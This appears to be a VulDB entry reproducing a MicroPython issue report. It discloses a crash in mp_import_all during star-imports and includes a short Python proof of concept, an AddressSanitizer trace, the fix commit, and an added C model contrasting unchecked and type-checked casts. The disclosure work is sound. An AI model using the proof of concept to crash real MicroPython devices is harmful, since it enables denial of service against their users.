| Title | micropython 0fd0843 Memory Corruption |
|---|
| Description | ### Port, board and/or hardware
unix
### MicroPython version
[v1.27.0](https://github.com/micropython/micropython/releases/tag/v1.27.0) and master-branch
### Issue Report
### Description
We discovered a Segmentation Fault vulnerability in MicroPython. The crash occurs within mp_map_lookup when executing a from ... import * operation (handled by mp_import_all) on a malformed or unexpected object type.
The ASAN report indicates a READ memory access violation causing a SEGV. Notably, ASAN hints at a dereference of a high value address, suggesting that the runtime is attempting to interpret invalid data (garbage or a non-pointer value) as a memory address during the map lookup.
Vendor confirmed and fixed this vulnerability in commit [add796b](https://github.com/dpgeorge/micropython/commit/add796bde13428938d87a97bb00cfa883494af39).
### Environment
- OS: Linux x86_64
- Compiler: gcc 11.5.0
- Tools: AddressSanitizer
- Affected Version: `master branch`
- Build Configure:
```
make CFLAGS_EXTRA="-fsanitize=address --param asan-use-after-return=0" \
LDFLAGS_EXTRA="-fsanitize=address --param asan-use-after-return=0" \
CC=gcc STRIP= -j$(nproc)
```
### Vulnerability Details
- Target: MicroPython (Unix Port)
- Vulnerability Type: Segmentation Fault (READ access via bad pointer)
- Function: mp_map_lookup
- Location: py/map.c:162
- Root Cause Analysis: The crash sequence is mp_execute_bytecode -> mp_import_all -> mp_map_lookup. mp_import_all implements the logic for from module import *. It expects to retrieve the globals dictionary (map) from the source object. The crash in mp_map_lookup suggests that:
1. The object being imported from is corrupted or is of a type that mp_import_all does not handle correctly, leading to an invalid map pointer.
2. The map structure itself contains corrupted pointers (buckets), and the "high value address" indicates the code is trying to follow a pointer that is actually garbage data.
### Reproduce
1. Compile the micropython with gcc compiler and AddressSanitizer enabled
2. Run the micropython with the POC input.
#### Proof of Concept:
```
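import builtins

# Replacement import hook: returns a class object instead of a module.
def custom_import(name, globals, locals, fromlist, level):
    class M:
        a = 1
    return M

builtins.__import__ = custom_import
__import__('A', None, None, None, 0)
# Star-import from the object returned by the hook.
from a import *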
```
ASAN report
```
==36150==ERROR: AddressSanitizer: SEGV on unknown address (pc 0x55e03cb9e967 bp 0x000000000b5a sp 0x7ffe1df7dfe0 T0)
==36150==The signal is caused by a READ memory access.
==36150==Hint: this fault was caused by a dereference of a high value address (see register values below). Dissassemble the provided pc to learn which register was used.
#0 0x55e03cb9e967 in mp_map_lookup ../../py/map.c:162
#1 0x55e03cb9a20f in mp_import_all ../../py/runtime.c:1598
#2 0x55e03cbd12bf in mp_execute_bytecode ../../py/vm.c:1277
#3 0x55e03cbaa19d in fun_bc_call ../../py/objfun.c:295
#4 0x55e03cc8d2bb in parse_compile_execute ../../shared/runtime/pyexec.c:137
#5 0x55e03cc857e0 in do_file /src/repro/micropython/ports/unix/main.c:269
#6 0x55e03cc857e0 in main_ /src/repro/micropython/ports/unix/main.c:692
#7 0x7f7e4b6131c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9)
#8 0x7f7e4b61328a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a)
#9 0x55e03cb62fd4 in _start (/src/repro/micropython/ports/unix/build-standard/micropython+0x84fd4)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV ../../py/map.c:162 in mp_map_lookup
==36150==ABORTING
```
### What does this issue allow an attacker to do?
Denial of Service (DoS). An attacker can crash the MicroPython runtime by attempting to perform a specific import operation (likely from <malformed_obj> import *) inside a script. This causes the device to reset or the process to terminate.
### How does the attacker exploit this issue?
The attacker supplies a Python script that uses from ... import * syntax on a specially crafted object or module structure. This forces mp_import_all to pass an invalid or corrupted map pointer to mp_map_lookup. The runtime then attempts to read from a wild address (the "high value" address), causing a segmentation fault.
### Code of Conduct
Yes, I agree |
|---|
| Source | ⚠️ https://github.com/micropython/micropython/issues/18639 |
|---|
| User | Oneafter (UID 92781) |
|---|
| Submission | 21.01.2026 08:20 (5 months ago) |
|---|
| Moderation | 05.02.2026 18:10 (15 days later) |
|---|
| Status | accepted |
|---|
| VulDB entry | 344546 [micropython up to 1.27.0 py/runtime.c mp_import_all memory corruption] |
|---|
| Points | 20 |
|---|
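
The first root-cause hypothesis in the issue report above (an object of a type that mp_import_all does not handle is treated as if it carried a globals map) can be modelled in a few lines of C. This is an added example, not MicroPython source and not the fix in commit add796b; the struct layout and the names `obj_t`, `globals_unchecked`, `globals_checked` and `import_all` are assumptions made for illustration.

```c
#include <stddef.h>
#include <stdio.h>

/* Simplified object model (assumption, not MicroPython's real structs). */
typedef enum { T_MODULE, T_CLASS } tag_t;
typedef struct { const char *name; int value; } entry_t;
typedef struct { size_t used; const entry_t *table; } map_t;
/* slot is a map_t* only when type == T_MODULE; otherwise unrelated data. */
typedef struct { tag_t type; void *slot; } obj_t;

/* Unchecked pattern: trusts that the caller passed a module. For any other
 * object the returned "map" is unrelated bytes, and reading its table
 * pointer follows garbage, the kind of wild READ the ASAN report shows. */
map_t *globals_unchecked(obj_t *o) { return (map_t *)o->slot; }

/* Checked pattern: confirm the type tag before reinterpreting the slot. */
map_t *globals_checked(obj_t *o) {
    return (o != NULL && o->type == T_MODULE) ? (map_t *)o->slot : NULL;
}

/* Model of "from x import *": copy public names into dest.
 * Returns the number copied, or -1 so the caller can raise an error. */
int import_all(obj_t *src, entry_t *dest, size_t cap) {
    map_t *map = globals_checked(src);
    if (map == NULL) return -1;
    size_t n = 0;
    for (size_t i = 0; i < map->used && n < cap; i++) {
        const char *name = map->table[i].name;
        if (name == NULL || name[0] == '_') continue; /* skip private names */
        dest[n++] = map->table[i];
    }
    return (int)n;
}

/* Constructed sample objects. */
static const entry_t mod_entries[] = { {"a", 1}, {"_hidden", 2}, {"b", 3} };
static map_t mod_map = { 3, mod_entries };
static char class_data[] = "class M";          /* not a map_t at all */
obj_t sample_module = { T_MODULE, &mod_map };
obj_t sample_class  = { T_CLASS, class_data };

int main(void) {
    entry_t out[4];
    printf("module: %d names\n", import_all(&sample_module, out, 4));
    printf("class:  %d (rejected)\n", import_all(&sample_class, out, 4));
    return 0;
}
```

Building the model with `-fsanitize=address`, as in the report's build configuration, and swapping `globals_checked` for `globals_unchecked` inside `import_all` shows why the tag test has to come before the cast.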